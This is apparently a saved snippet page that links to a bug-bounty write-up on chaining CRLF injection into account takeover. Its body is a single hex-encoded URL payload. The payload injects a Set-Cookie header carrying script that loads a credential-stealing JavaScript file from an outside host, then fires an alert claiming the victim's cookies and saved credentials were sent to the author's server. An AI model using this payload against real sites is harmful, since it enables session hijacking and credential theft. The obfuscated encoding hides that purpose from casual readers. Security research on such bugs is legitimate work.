CRLF to Account takeover (chaining bugs) | by MoSec | Jul, 2022 | Medium

PHOTO EMBED

Wed Jul 20 2022 14:23:37 GMT+0000 (Coordinated Universal Time)

Saved by @pirate 

HTTP://crlfsub.redacted.com/%0a%0dSet-Cookie:vset=%74%65%73%74%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%6f%62%78%73%73%2e%73%65%72%76%65%72%2e%63%6f%6d%2f%73%74%65%61%6c%5f%63%72%65%64%73%2e%6a%73%3e%3c%2f%73%63%72%69%70%74%3e%3c%69%6d%67%20%73%72%63%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28'%74%68%69%73%5f%69%73%5f%78%73%73%5f%74%6f%5f%41%54%4f%5f%79%6f%75%72%5f%63%6f%6f%6b%69%65%73%5f%61%6e%64%5f%73%61%76%65%64%5f%63%72%65%64%73%5f%68%61%73%5f%62%65%65%6e%5f%73%65%6e%74%5f%74%6f%5f%6d%6f%73%65%63%5f%73%65%72%76%65%72%5f%73%6f%5f%79%6f%75%5f%61%72%65%5f%70%77%6e%65%64'%29%3e%22;path=/;domain=.redacted.com;articles/some-articles
content_copyCOPY

https://medium.com/@moSec/crlf-to-account-takeover-chaining-bugs-21a25dfa1cdf#id_token